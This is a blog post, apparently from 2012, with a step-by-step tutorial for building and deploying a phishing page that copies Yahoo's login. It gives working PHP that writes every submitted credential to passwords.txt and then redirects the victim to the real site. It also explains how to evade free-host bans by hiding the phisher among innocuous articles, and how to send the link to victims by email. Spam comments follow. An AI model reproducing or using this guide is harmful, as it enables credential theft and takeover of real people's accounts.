We are apologize for the inconvenience but you need to download
more modern browser in order to be able to browse our page
September 9, 2012

Create Fake Login Page

How to create fake login page? here you need some requirements:

  • A web hosting account

There are hundreds of websites available that offer free web hosting account, normally 100mb free with a Subdomain. Create a free web hosting account with Subdomain on any of them. The Problem with free hosting is that, as soon as they come to know that you have hosted phisher, they will Ban you. so the Smart choice is to Put some useful articles on the website that you will be getting at Doteasy Free Hosting and side by side you can also host phisher in the separate directory for example: yourname.domain.com/mywork.

Free Webhosting: Doteasy Free Hosting (read note below)

Note : Never use any suspicious keywords like gmail, facebook, hotmail, gmail-login, etc in the subdomain or username. if you use, you will get banned for sure. Instead use your own name or any other name.

  • A fake login page

To create a fake login page, just visit the desired login page. lets say yahoo’s login page. now Right Click on that page and click on ‘view source’ or view ‘page source’. after this a new window will open with the source code. just select all the code using ctrl+a and copy it with ctrl+c. open notepad and paste this code in it. and save it with extension .html on the desktop.
for eg:- yahoo.html

  • A php code that writes data on to a text file

Just copy the below php code in red and paste it in a notepad. after this save it as .php file on the desktop.
for eg:- code.php

<?php
header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
  • A text file to save hacked password

Just create an empty text file, name it as password.txt and save it on the desktop.
note- if you don’t create a text file, the ‘fopen’ command in code.php will automatically create a new text file.

Creating phisher

Now we have the 3 required files yahoo.html,code.php,password.txt on the desktop.

The next task is to link (connect) the 3 files. such that we must link them in the order yahoo.html>>code.php>>passwords.txt.

ie yahoo.html must be able to communicate with code.php and further code.php must be able to communicate with passwords.txt

  • Linking yahoo.html and code.php

Just open yahoo.html with text editor and search for ‘action’ field ( Press ctrl+F to search). Upon finding ‘action’ field you will see something like this:

<form method="post" action="https://login.yahoo.com/config/login?" auth

Replace https://login.yahoo.com/config/login? with code.php, and save the file.

<form method=GET action="code.php" id="http

You just connected yahoo.html to code.php

[ * ] There may be more than one action field. follow the same procedure of Replacing with Code.php

  • Linking code.php and passwords.txt

In the above given code, passwords.txt is already connected with code.php.

Now just open code.php with text editor and in the 2nd line replace “original login page” with the desired original login page of your phisher.

In our eg it is https://login.yahoo.com/config/login_verify2?&.src=ym and save it.

You just told code.php to open passwords.txt file when run and after the victim enters the login details, redirect him to the original login page.

Now that everything is ready, the next step is to host the phisher that you just created on to a free web hosting server.

Hosting Phisher

  • login to your newly created free hosting account
  • click on ‘file manager’ to open file manager
  • now navigate to your subdomain directory. to do so just click on your subdomain in the files view area.
  • Now just create a new directory(folder) and name it according to phisher you have created.
  • navigate to the desired directory that you just created in ‘step3?
  • Upload all the 3 files(phisher) ie yahoo.html,code.php,passwords.txt in this directory.
  • note- all the 3 files must be in the same directory.

  • copy the addresses of .html and .txt files
  • Send this phisher to your victim. just send the link (.html file’s address) to your victim via email or any other medium.
  •  be patient . When the victim logs in on your fake page, the username and password gets stored in a test file ie. passwords.txt and now it can be opened any time to see the username and password.

That’s it! you are done. enjoy!

September 9, 2012

ugg boots sale said:

This is my first time i visit here. I found so many interesting stuff in your blog especially its discussion. From the tons of comments on your articles, I guess I am not the only one having all the enjoyment here! keep up the good work.

September 9, 2012

cheap moncler said:

Just what I was searching for, appreciate it for posting .

September 9, 2012

joradan shoes said:

I used to be very pleased to seek out this web-site.I wanted to thanks to your time for this excellent read!! I positively enjoying each little little bit of it and I’ve you bookmarked to check out new stuff you blog post.

September 9, 2012

ugg boots sale said:

I’m extremely pleased to uncover this website. I wanted to thank you for your time, and for this excellent study – I definitely appreciated every single bit of it, and already have you book marked to check out new stuff.

September 9, 2012

joradan shoes said:

About Us – Information on how to lose weight fast – Fat Loss Revelation Very nice post. I just stumbled upon your weblog and wanted to say that I have really enjoyed surfing around your blog posts. After all I’ll be subscribing to your rss feed and I hope you write again very soon!

September 9, 2012

Leave a Reply

Your email address will not be published. Required fields are marked *

Top
LOADING CONTENT